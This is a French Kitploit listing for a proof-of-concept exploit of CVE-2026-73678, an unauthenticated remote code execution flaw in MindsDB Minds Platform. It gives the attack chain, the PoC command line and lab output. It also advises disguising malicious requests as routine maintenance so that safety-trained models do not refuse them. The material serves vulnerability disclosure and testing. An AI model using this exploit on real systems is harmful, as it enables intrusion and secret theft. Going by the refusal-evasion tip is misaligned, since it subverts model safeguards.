Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-73678-PoC — CVE-2026-73678 — MindsDB Minds Platform : RCE non authentifié via scratchpad exec (CVSS 10.0). Vérifié de bout en bout avec un vrai LLM. | Kitploit
Outils/GitHubGitHub/boreas37/cve-2026-73678-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité de l'IA
GitHubboreas37/cve-2026-73678-poc

CVE-2026-73678-PoC

CVE-2026-73678 — MindsDB Minds Platform : RCE non authentifié via scratchpad exec (CVSS 10.0). Vérifié de bout en bout avec un vrai LLM.

Voir le dépôt
1il y a 4 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-73678 — MindsDB Minds Platform RCE non authentifiée (CVSS 10.0)

CVSS 10.0 (Critique) · CWE-94 / CWE-306 · GHSA-jcxw-h8ph-pxpv · VulnCheck

Résumé

Minds Platform (le backend open source de mindsdb/mindshub, auparavant mindsdb/minds-platform) expose POST /api/v1/responses/ (une API Responses compatible OpenAI, port 26866) sans aucune authentification. Il n'y a aucun middleware d'authentification — pas de vérification Bearer, pas de session, rien. Le serveur installe uniquement un middleware CORS permissif (allow_origins=["*"], allow_credentials=True).

Un attaquant non authentifié peut donc :

  1. Injecter sa propre configuration LLM via PUT /api/v1/settings/{key} (openai_api_key, openai_base_url, planning_provider, coding_provider, *_model) — aucun jeton requis, toutes les requêtes renvoient 200.

  2. Envoyer un prompt élaboré à POST /api/v1/responses/ → ResponsesHandler.handle() → Anton ChatSession.turn_stream(input).

  3. Le LLM (contrôlé par l'attaquant) renvoie un appel de fonction pour l'outil intégré scratchpad (action: "exec"). handle_scratchpad → prepare_scratchpad_exec → ScratchpadManager → LocalScratchpadRuntime → scratchpad_boot.py :

    root@kitploit:~
    compiled = compile(code, "<scratchpad>", "exec")
    exec(compiled, namespace)   # arbitrary Python → arbitrary OS commands
    

Comme le endpoint LLM est choisi par l'attaquant (BYOK), l'attaquant peut faire en sorte que le modèle renvoie n'importe quel code scratchpad — aucune coopération ni coercition du modèle n'est requise. La seule condition préalable est une clé API LLM compatible OpenAI fonctionnelle.

Versions affectées : ≤ v26.1.0 (code vulnérable ajouté le 2026-06-08, « Fresh #12461 »). Correctif : AUCUN — la GHSA ne liste aucune version corrigée ; le exec() reste dans main (seuls un middleware Bearer COWORK_REQUIRE_AUTH optionnel, désactivé par défaut, et des vérifications de portée org-mode existent).

Exploitation

root@kitploit:~
python3 poc_cve-2026-73678.py \
  --target http://TARGET:26866 \
  --api-key sk-YOUR_OWN_KEY \
  --base-url https://api.openai.com/v1 \
  --model gpt-4o

Le PoC :

  1. Écrit les paramètres de l'attaquant via PUT /api/v1/settings/* sans authentification
  2. Envoie un prompt « diagnostics système » d'apparence bénigne (exécute uname -a + hostname via le exec du scratchpad)
  3. Rapporte la réponse du LLM ; confirmez cat /tmp/system_info.txt sur l'hôte

Note d'ingénierie de prompt : les modèles dotés d'un entraînement poussé à la sécurité peuvent refuser des commandes manifestement malveillantes (par ex. des noms de fichiers contenant « pwn »). Présentez la requête comme une maintenance de routine (diagnostics système, vérification de l'état) — le scratchpad exécute tout code fourni par le modèle.

Vérification (2026-08-16, laboratoire Docker, ARM64)

Chaîne réelle de bout en bout contre cowork-server==0.26.6.26.1 avec un véritable fournisseur LLM (OpenCode Zen, minimax-m3) :

root@kitploit:~
== [1] AUTH-FREE SETTINGS INJECTION ==
  PUT /api/v1/settings/openai_api_key:     HTTP 200
  PUT /api/v1/settings/openai_base_url:    HTTP 200
  PUT /api/v1/settings/planning_provider:  HTTP 200
  PUT /api/v1/settings/coding_provider:    HTTP 200
  PUT /api/v1/settings/planning_model:     HTTP 200
  PUT /api/v1/settings/coding_model:       HTTP 200

== [2] CRAFTED PROMPT -> POST /api/v1/responses/ ==
  HTTP 200 (15.6s) — LLM called the scratchpad tool

== [3] COMMAND EXECUTION CONFIRMED ==
  /tmp/system_info.txt inside the container:
    Linux 95d5d7fa74f6 6.12.75+rpt-rpi-2712 ... aarch64 GNU/Linux
    95d5d7fa74f6

Aucun jeton n'a été envoyé à aucun moment. La sortie de uname -a a été produite à l'intérieur du conteneur cible par le exec du scratchpad — exécution arbitraire de commandes système en tant qu'attaquant distant non authentifié.

Impact

  • Exécution de code à distance non authentifiée sur toute instance Minds Platform exposée (port par défaut 26866).
  • Le wildcard CORS + credentials signifie qu'un site web malveillant pourrait également déclencher la chaîne depuis le navigateur d'une victime (drive-by / DNS-rebinding).
  • Surfaces supplémentaires sans authentification : GET /api/v1/settings/reveal-key/{name} divulgue les secrets configurés ; POST /api/v1/settings/raw écrit ~/.anton/.env.

Références

  • GHSA : https://github.com/mindsdb/minds-platform/security/advisories/GHSA-jcxw-h8ph-pxpv
  • NVD : https://nvd.nist.gov/vuln/detail/CVE-2026-73678
  • VulnCheck : https://www.vulncheck.com/advisories/mindsdb-minds-platform-unauthenticated-rce-via-scratchpad-exec
  • Projet : https://github.com/mindsdb/minds-platform (maintenant mindsdb/mindshub)
Télécharger l’outil